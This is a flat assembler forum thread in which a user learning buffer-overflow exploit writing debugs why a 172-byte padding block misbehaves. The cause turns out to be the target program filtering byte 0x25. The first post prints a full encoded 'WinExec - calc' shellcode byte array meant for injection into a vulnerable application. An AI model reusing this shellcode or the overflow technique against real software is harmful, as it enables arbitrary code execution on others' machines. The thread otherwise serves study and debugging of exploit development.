flat assembler
Message board for the users of flat assembler.

Index > Main > define byte problem

Author
Thread Post new topic Reply to topic
Overflowz



Joined: 03 Sep 2010
Posts: 1046
Overflowz
Hello everyone! I have problem here.. First of all, I'm studying at stack/buffer overflows and writing exploits in asm as well. Now, my problem is when I'm doing something like this:
Code:
shellcode:
db 172 dup 0x41    

and after attaching vulnerable application to debugger, I don't see any 0x41 instruction there.. BUT, when I'm using this shellcode:
Code:
;WinExec - calc 172 bytes
shellcode:
db 0x31, 0xc9, 0x83, 0xe9, 0xdb, 0xd9, 0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, 0x13, 0xd8
db 0x22, 0x72, 0xe4, 0x83, 0xeb, 0xfc, 0xe2, 0xf4, 0x24, 0xca, 0x34, 0xe4, 0xd8, 0x22, 0xf9, 0xa1
db 0xe4, 0xa9, 0x0e, 0xe1, 0xa0, 0x23, 0x9d, 0x6f, 0x97, 0x3a, 0xf9, 0xbb, 0xf8, 0x23, 0x99, 0x07
db 0xf6, 0x6b, 0xf9, 0xd0, 0x53, 0x23, 0x9c, 0xd5, 0x18, 0xbb, 0xde, 0x60, 0x18, 0x56, 0x75, 0x25
db 0x12, 0x2f, 0x73, 0x26, 0x33, 0xd6, 0x49, 0xb0, 0xfc, 0x26, 0x07, 0x07, 0x53, 0x7d, 0x56, 0xe5
db 0x33, 0x44, 0xf9, 0xe8, 0x93, 0xa9, 0x2d, 0xf8, 0xd9, 0xc9, 0xf9, 0xf8, 0x53, 0x23, 0x99, 0x6d
db 0x84, 0x06, 0x76, 0x27, 0xe9, 0xe2, 0x16, 0x6f, 0x98, 0x12, 0xf7, 0x24, 0xa0, 0x2d, 0xf9, 0xa4
db 0xd4, 0xa9, 0x02, 0xf8, 0x75, 0xa9, 0x1a, 0xec, 0x31, 0x29, 0x72, 0xe4, 0xd8, 0xa9, 0x32, 0xd0
db 0xdd, 0x5e, 0x72, 0xe4, 0xd8, 0xa9, 0x1a, 0xd8, 0x87, 0x13, 0x84, 0x84, 0x8e, 0xc9, 0x7f, 0x8c
db 0x28, 0xa8, 0x76, 0xbb, 0xb0, 0xba, 0x8c, 0x6e, 0xd6, 0x75, 0x8d, 0x03, 0x30, 0xcc, 0x8d, 0x1b
db 0x27, 0x41, 0x13, 0x88, 0xbb, 0x0c, 0x17, 0x9c, 0xbd, 0x22, 0x72, 0xe4    

I see instructions and works fine!
Reason, why I'm posting it here is that I tried instead of
Code:
shellcode:
db 172 dup 0x41    

I've done this and it worked like a charm!
Code:
shellcode:
db 170 dup 0x41    

My question is, is there something wrong with db/dup macros ?
Thank you.
Post 02 Jun 2011, 21:23
View user's profile Send private message Reply with quote
bitshifter



Joined: 04 Dec 2007
Posts: 764
Location: Massachusetts, USA
bitshifter
well using fasm listing tool we can see the output is correct (or at least as expected)
Code:
00000000: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       db 172 dup 0x41
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41       
          41 41 41 41 41 41 41 41 41 41 41 41    
Post 03 Jun 2011, 02:23
View user's profile Send private message Reply with quote
Overflowz



Joined: 03 Sep 2010
Posts: 1046
Overflowz
bitshifter
Then it's programs problem ? I can't find any dfference.. only addresses there.
Here's pics.


Description: shellcode, WinExec - calc 172 bytes
Filesize: 219.1 KB
Viewed: 1651 Time(s)

shellcode.JPG


Description: 0x41 with dups; 172 bytes
Filesize: 211.79 KB
Viewed: 1650 Time(s)

0x41-dups.JPG


Post 03 Jun 2011, 07:52
View user's profile Send private message Reply with quote
Overflowz



Joined: 03 Sep 2010
Posts: 1046
Overflowz
I've counted sent and original shellcode's sizes.
sent - 170 bytes
original - 172 bytes
I guess 2 bytes were filtered by the program.. I'm right ?
EDIT:
Ha! I found! program filters 0x25 (% symbol) and another 2 next bytes with something..
Original:
Code:
db 0x25, 0x12, 0x2f    

Become:
Code:
db 0x00    

That's why it's missing 2 bytes ))
Thread closed now.
Post 03 Jun 2011, 09:56
View user's profile Send private message Reply with quote
Display posts from previous:
Post new topic Reply to topic

Jump to:  


< Last Thread | Next Thread >
Forum Rules:
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Copyright © 1999-2020, Tomasz Grysztar. Also on GitHub, YouTube, Twitter.

Website powered by rwasa.